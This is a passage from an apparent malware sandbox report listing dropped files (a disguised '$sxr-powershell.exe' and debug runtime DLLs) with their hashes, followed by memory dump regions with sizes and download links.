f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/452-239-0x000001D020DE0000-0x000001D020DF0000-memory.dmp

Filesize
64KB

Download
memory/452-241-0x000001D020DE0000-0x000001D020DF0000-memory.dmp

Filesize
64KB

Download
memory/460-320-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/460-323-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/460-334-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/460-318-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/460-328-0x00007FF94DB70000-0x00007FF94DC2E000-memory.dmp

Filesize
760KB

Download
memory/528-358-0x0000023461960000-0x0000023461987000-memory.dmp

Filesize
156KB

Download
memory/528-360-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/528-409-0x0000023461960000-0x0000023461987000-memory.dmp

Filesize
156KB

Download
memory/584-337-0x0000027490210000-0x0000027490231000-memory.dmp

Filesize
132KB

Download
memory/584-342-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/584-345-0x0000027490240000-0x0000027490267000-memory.dmp

Filesize
156KB

Download
memory/584-339-0x0000027490240000-0x0000027490267000-memory.dmp

Filesize
156KB

Download
memory/664-340-0x00000268F8550000-0x00000268F8577000-memory.dmp

Filesize
156KB

Download
memory/664-343-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/664-348-0x00000268F8550000-0x00000268F8577000-memory.dmp

Filesize
156KB

Download
memory/944-351-0x0000023A0E9A0000-0x0000023A0E9C7000-memory.dmp

Filesize
156KB

Download
memory/944-352-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/964-414-0x000001A0852E0000-0x000001A085307000-memory.dmp

Filesize
156KB

Download
memory/964-364-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/964-363-0x000001A0852E0000-0x000001A085307000-memory.dmp

Filesize
156KB

Download
memory/1012-350-0x000001D72E590000-0x000001D72E5B7000-memory.dmp

Filesize
156KB

Download
memory/1012-353-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/1012-354-0x000001D72E590000-0x000001D72E5B7000-memory.dmp

Filesize
156KB

Download
memory/1032-368-0x0000020F2B5B0000-0x0000020F2B5D7000-memory.dmp

Filesize
156KB

Download
memory/1032-371-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/1032-419-0x0000020F2B5B0000-0x0000020F2B5D7000-memory.dmp

Filesize
156KB

Download
memory/1048-369-0x0000017F13D00000-0x0000017F13D27000-memory.dmp

Filesize
156KB

Download
memory/1048-423-0x0000017F13D00000-0x0000017F13D27000-memory.dmp

Filesize
156KB

Download
memory/1048-370-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/1136-428-0x000001F295F70000-0x000001F295F97000-memory.dmp

Filesize
156KB

Download
memory/1136-375-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/1136-373-0x000001F295F70000-0x000001F295F97000-memory.dmp

Filesize
156KB

Download
memory/1208-379-0x000001EEF1380000-0x000001EEF13A7000-memory.dmp

Filesize
156KB

Download
memory/1208-380-0x00007FF90E8D0000-0x00007FF90E8E0000-memory.dmp

Filesize
64KB

Download
memory/1208-434-0x000001EEF1380000-0x000001EEF13A7000-memory.dmp

Filesize
156KB

Download
memory/1264-439-0x0000018408E70000-0x0000018408E97000-memory.dmp

Filesize
156KB

Download
memory/1272-444-0x0000024D112A0000-0x0000024D112C7000-memory.dmp

Filesize
156KB

Download
memory/1588-327-0x0000023E484C0000-0x0000023E484D0000-memory.dmp

Filesize
64KB

Download
memory/1588-324-0x0000023E484C0000-0x0000023E484D0000-memory.dmp

Filesize
64KB

Download
memory/1684-152-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-149-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-146-0x00000237FEDA0000-0x00000237FEDC2000-memory.dmp

Filesize
136KB

Download
memory/1684-148-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-147-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-151-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-150-0x0000023781540000-0x0000023781550000-memory.dmp

Filesize
64KB

Download
memory/1684-154-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/1684-155-0x00007FF94DB70000-0x00007FF94DC2E000-memory.dmp

Filesize
760KB

Download
memory/1684-156-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/2128-300-0x000001FAF41D0000-0x000001FAF41E0000-memory.dmp

Filesize
64KB

Download
memory/2448-298-0x00000213F03B0000-0x00000213F03C0000-memory.dmp

Filesize
64KB

Download
memory/2448-297-0x00000213F03B0000-0x00000213F03C0000-memory.dmp

Filesize
64KB

Download
memory/3536-243-0x00000257B3F20000-0x00000257B3F30000-memory.dmp

Filesize
64KB

Download
memory/4060-238-0x0000023875270000-0x0000023875280000-memory.dmp

Filesize
64KB

Download
memory/4788-158-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4788-160-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4836-237-0x000001F2F5D40000-0x000001F2F5D50000-memory.dmp

Filesize
64KB

Download
memory/4836-236-0x000001F2F5D40000-0x000001F2F5D50000-memory.dmp

Filesize
64KB

Download
memory/4904-301-0x000002125F8A0000-0x000002125F8B0000-memory.dmp

Filesize
64KB

Download
memory/4996-299-0x00000205205E0000-0x00000205205F0000-memory.dmp

Filesize
64KB

Download
memory/5044-190-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/5044-316-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/5044-306-0x000001A7F3400000-0x000001A7F35C2000-memory.dmp

Filesize
1.8MB

Download
memory/5044-305-0x000001A7F2CE0000-0x000001A7F2D92000-memory.dmp

Filesize
712KB

Download
memory/5044-410-0x000001A7F2DA0000-0x000001A7F2DB2000-memory.dmp

Filesize
72KB

Download
memory/5044-418-0x000001A7F3370000-0x000001A7F33AC000-memory.dmp

Filesize
240KB

Download
memory/5044-304-0x000001A7F2BD0000-0x000001A7F2C20000-memory.dmp

Filesize
320KB

Download
memory/5044-191-0x00007FF94DB70000-0x00007FF94DC2E000-memory.dmp

Filesize
760KB

Download
memory/5044-186-0x00007FF94DB70000-0x00007FF94DC2E000-memory.dmp

Filesize
760KB

Download
memory/5044-185-0x00007FF94E850000-0x00007FF94EA45000-memory.dmp

Filesize
2.0MB

Download
memory/5044-184-0x000001A7EE1E0000-0x000001A7EE1F0000-memory.dmp

Filesize
64KB

Download
memory/5044-183-0x000001A7EE1E0000-0x000001A7EE1F0000-memory.dmp

Filesize
64KB

Download
memory/5044-182-0x000001A7EE1E0000-0x000001A7EE1F0000-memory.dmp

Filesize
64KB

Download